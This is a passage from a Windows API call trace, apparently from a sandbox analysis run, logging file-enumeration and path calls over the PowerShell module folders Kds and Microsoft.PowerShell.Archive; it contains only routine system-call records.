dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.864] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0264.864] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0264.865] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.865] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0264.865] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0264.865] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.865] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.866] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.866] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0264.866] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.866] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.866] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0264.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.866] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.867] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0264.867] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0264.867] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.867] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.867] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.867] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0264.867] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0264.868] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.868] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0264.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.868] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0264.868] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0264.868] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.868] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.869] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.869] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0264.869] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0264.869] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0264.869] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.910] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0264.910] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0264.910] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.910] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.911] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.911] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0264.911] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0264.911] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.911] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0264.912] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0264.912] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0264.912] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.912] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.912] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0264.912] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0264.912] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0264.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0264.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0264.913] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0264.917] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0264.917] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.917] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.917] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0264.917] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.917] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0264.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0264.918] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b81df70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0264.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3b0) returned 1 [0264.918] GetFileAttributesExW (in: 